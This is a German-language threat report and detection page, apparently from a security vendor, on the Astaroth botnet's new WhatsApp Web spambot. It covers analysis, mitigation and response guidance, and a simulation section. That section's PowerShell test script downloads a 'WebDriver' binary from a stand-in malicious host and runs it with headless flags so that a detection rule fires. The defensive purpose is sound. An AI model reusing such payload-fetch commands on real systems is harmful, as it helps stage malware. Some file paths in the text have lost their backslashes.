Astaroth Fügt Eine Neue Spambot-Komponente Für E-Mail-Kampagnen Hinzu
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Die Betreiber des Astaroth-Botnetzes haben eine neue WhatsApp-Web-Spambot-Komponente hinzugefügt, um ihre Reichweite im lateinamerikanischen eCrime-Ökosystem zu erweitern. Das Modul verwendet eine kopflose Browserautomatisierung, um kompromittierte Opfer in Verteilungsknoten umzuwandeln, indem bösartige Nachrichten an deren WhatsApp-Kontakte gesendet werden. Diese Entwicklung markiert einen Wandel vom traditionellen E-Mail-Spam hin zu sozialen Nachrichtenplattformen.
Untersuchung
Die Untersuchung umfasste eine detaillierte technische Analyse des Astaroth-Spambots, bei der AES-CTS-Verschlüsselung, ein komplexer sechsstufiger String-Verschleierungsprozess und benutzerdefinierte Konfigurationsstrukturen aufgedeckt wurden. Die Forscher identifizierten beträchtliche Codeähnlichkeiten zwischen den Astaroth- und Vareg-Spambots, was auf gemeinsame Entwickler oder Absprachen zum Code-Austausch hindeutet. Die Analyse bestätigte auch den Missbrauch legitimer Browserautomatisierungs-Frameworks, einschließlich WebDriver und WPPConnect/WA-JS, um verdeckte Spam-Kampagnen durchzuführen.
Minderung
Organisationen sollten Benutzer über auf WhatsApp basierende Social-Engineering-Angriffe aufklären und davon abraten, Dateien von unbekannten Kontakten zu öffnen oder auszuführen. Browser-Download-Schutzmaßnahmen sollten aktiviert werden, und nicht autorisierte WebDriver-Downloads und -Ausführungen sollten genau überwacht werden. Sicherheitsteams sollten auch auf verdächtige Verzeichniserstellungen im Windows-Temp-Ordner achten und in Betracht ziehen, WPPConnect/WA-JS zu blockieren, wenn es nicht für legitime geschäftliche Zwecke benötigt wird.
Antwort
Wenn Astaroth-Aktivitäten erkannt werden, sollten betroffene Endpunkte sofort isoliert werden, um die weitere Verbreitung von Spam und Malware-Lieferungen zu stoppen. Ermittler sollten nach kopflosen Browserprozessen und ungewöhnlichen ChromeAuto_ Verzeichnissen innerhalb von C:UsersPublicTempsuchen. Identifizierte WebDriver-Prozesse sollten einer forensischen Analyse unterzogen werden, und die Netzwerkaktivitäten sollten auf nicht autorisierte Verbindungen zu bekannter Astaroth C2-Infrastruktur überprüft werden.
Angriffsablauf
Erkennungen
Verdächtige Befehls- und Kontrollvorgänge durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfragen (über DNS)
Anzeigen
IOCs (HashSha256) zur Erkennung: Im Inneren der neuen Astaroth-Spambot-Komponente
Anzeigen
Erkennung von Astaroth-Spambot-WebDriver-Aktivitäten [Windows-Prozess-Erstellung]
Anzeigen
Simulationsausführung
Voraussetzung: Der Telemetrie- und Basislinien-Preflight-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle: Der Angreifer beabsichtigt, ein automatisiertes WhatsApp-Spamming-Modul einzusetzen. Dazu nutzt er zunächst eine Living-off-the-land-Technik, indem er PowerShell verwendet, um einen bestimmten
WebDriverBinary in ein lokales Verzeichnis herunterzuladen. Sobald das Tool vorhanden ist, führt der Angreifer das Binary unter Verwendung der--headlessand--disable-infobarsFlags aus. Dies ermöglicht es der Automatisierung, im Hintergrund unsichtbar für den Benutzer zu laufen und so die Spamming-Kampagne zu erleichtern, während der Fußabdruck auf dem Host minimiert wird. -
Regressionstest-Skript:
# Astaroth Spambot Simulationsskript # Dieses Skript simuliert die Download- und Ausführungssequenz, die in der Erkennungsregel definiert ist. $workDir = "$env:TEMPWebDriverSimulation" if (!(Test-Path $workDir)) { New-Item -Path $workDir -ItemType Directory } Set-Location $workDir # 1. Download simulieren (löst Auswahl_webdriver_download aus) Write-Host "[+] WebDriver-Download über PowerShell simulieren..." $dummyWebDriver = "WebDriver.exe" New-Item -Path $dummyWebDriver -ItemType File # Nachahmen der Befehlszeile, nach der die Regel sucht powershell.exe -Command "Invoke-WebRequest -Uri 'http://fake-malware-site.com/WebDriver' -OutFile 'WebDriver.exe'" # 2. Ausführung simulieren (löst Auswahl_webdriver_execution und Auswahl_session_creation aus) Write-Host "[+] WebDriver-Ausführung mit kopflosen Flags simulieren..." # Wir verwenden Start-Process, um sicherzustellen, dass die Befehlszeile als Prozess-Erstellungsereignis erfasst wird Start-Process -FilePath ".$dummyWebDriver" -ArgumentList "--headless", "--disable-infobars" -NoNewWindow -
Bereinigungskommandos:
# Bereinigung der Simulationsartefakte Remove-Item -Path "$env:TEMPWebDriverSimulation" -Recurse -Force Write-Host "[+] Bereinigung abgeschlossen."